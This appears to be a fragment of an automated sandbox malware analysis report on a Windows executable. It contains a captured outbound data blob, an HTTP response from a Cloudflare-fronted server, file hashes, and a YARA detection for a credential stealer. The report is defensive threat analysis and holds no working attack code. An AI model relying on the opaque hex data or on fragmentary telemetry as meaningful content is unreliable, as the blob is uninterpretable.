                                                                                    2024-11-23 20:59:40 UTC15331OUTData Raw: a7 11 44 98 3c 71 ea 9b 0c e8 ba 71 a7 de 13 82 1f fe 14 20 f1 6f 79 85 8f 01 f3 c1 56 55 e5 26 87 39 f7 14 f8 21 04 cb cc f9 e1 38 53 c9 95 ef 9f c2 22 1b 46 50 a5 63 30 55 1f 24 10 18 3b 11 c9 f7 08 9d 97 3b 54 9d 68 dd 40 a9 43 0c 9c 0e a0 48 eb 9e 06 d6 3f e3 cf 4f 5e 8f 9d 3d c4 56 45 ad 0a 04 9b 23 4d 06 71 dd 83 81 30 3b 14 2a bd 7a 0d 65 20 bb bc 15 5b 63 d6 4b b7 8b 95 0e 36 b0 b7 74 d3 b9 c2 0e ca 14 7c 9f b9 aa b9 ca a0 ea 57 53 27 0d d0 7e 8e ee bb f8 ce 77 46 55 19 76 50 e5 b7 e4 22 b7 88 fa 80 71 c2 52 b0 ef 9c 79 11 e6 37 52 ce f3 0e fb 90 04 4f 9a d9 52 fd 0d e9 25 26 42 9c 4b ef 41 ce 45 d4 8a 97 ab 93 49 08 73 04 39 ee 8f 64 fb 0e c2 27 f1 f2 9d f3 9e 4d 6b 75 b3 e3 cd f9 c0 5b e9 ab 9a 04 76 27 f8 7d 8c b9 59 e1 4b ed cf c1 b0 9e e1 5a
                                                                                    Data Ascii: D<qq oyVU&9!8S"FPc0U$;;Th@CH?O^=VE#Mq0;*ze [cK6t|WS'~wFUvP"qRy7ROR%&BKAEIs9d'Mku[v'}YKZ
                                                                                    2024-11-23 20:59:45 UTC1014INHTTP/1.1 200 OK
                                                                                    Date: Sat, 23 Nov 2024 20:59:44 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Set-Cookie: PHPSESSID=thsa6vc1na7oepd01cd9fm2s08; expires=Wed, 19-Mar-2025 14:46:21 GMT; Max-Age=9999999; path=/
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    cf-cache-status: DYNAMIC
                                                                                    vary: accept-encoding
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LVVMKBDA3H4wJvaXuOSuFSWxS84Zc5pu87MfM4QEboLuyNRVwUhniKivwRqjrMVQmSCtapPnzfXQ7BJuVlTPmQu1jJ6R6aZ9Gyy9ZFmZHYifwytjhmXdDl5YtK7bxgGwgSW1hvw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8e74159afc3b1a38-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=2156&sent=194&recv=572&lost=0&retrans=0&sent_bytes=2845&recv_bytes=552647&delivery_rate=644591&cwnd=220&unsent_bytes=0&cid=a82efc43bb6afd9a&ts=4581&x=0"


                                                                                    Statistics

                                                                                    CPU Usage

                                                                                    Click to jump to process

                                                                                    Memory Usage

                                                                                    Click to jump to process

                                                                                    High Level Behavior Distribution

                                                                                    Click to dive into process behavior distribution

                                                                                    System Behavior

                                                                                    General

                                                                                    Target ID:0
                                                                                    Start time:15:59:16
                                                                                    Start date:23/11/2024
                                                                                    Path:C:\Users\user\Desktop\file.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                    Imagebase:0x30000
                                                                                    File size:1'851'904 bytes
                                                                                    MD5 hash:9E7BC3B3DD97D4C8F7549B9C66B2314F
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1500687810.0000000000B64000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    Disassembly

                                                                                    Reset < >

                                                                                      Non-executed Functions

                                                                                      Function 00B40848 Relevance: .1, Instructions: 68COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000003.1600993007.0000000000B3C000.00000004.00000020.00020000.00000000.sdmp, Offset: 00B3C000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_3_b3a000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 393398417eb01d8028a0336ed29fe4cfdd34e5594e155f233e502c419077dff1
                                                                                      • Instruction ID: 6a8940c5955fe289d9caa18d3b1f4bb57af20e7ef437cf8330d7aaf34ee41558
                                                                                      • Opcode Fuzzy Hash: 393398417eb01d8028a0336ed29fe4cfdd34e5594e155f233e502c419077dff1
                                                                                      • Instruction Fuzzy Hash: 4721FF7205A3C1AFCB52DF38C9D1A833F61AF4732474A82D8E4805E047D328A623CB92
                                                                                      Function 00B40848 Relevance: .1, Instructions: 68COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000003.1600993007.0000000000B3C000.00000004.00000020.00020000.00000000.sdmp, Offset: 00B3A000, based on PE: false
                                                                                      • Associated: 00000000.00000003.1544204856.0000000000B3A000.00000004.00000020.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_3_b3a000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a9d2e35ff53e1cbfe6b479e96df18c90b63f04cc91cd3786fc25d50427fd0156
                                                                                      • Instruction ID: 6a8940c5955fe289d9caa18d3b1f4bb57af20e7ef437cf8330d7aaf34ee41558
                                                                                      • Opcode Fuzzy Hash: a9d2e35ff53e1cbfe6b479e96df18c90b63f04cc91cd3786fc25d50427fd0156
                                                                                      • Instruction Fuzzy Hash: 4721FF7205A3C1AFCB52DF38C9D1A833F61AF4732474A82D8E4805E047D328A623CB92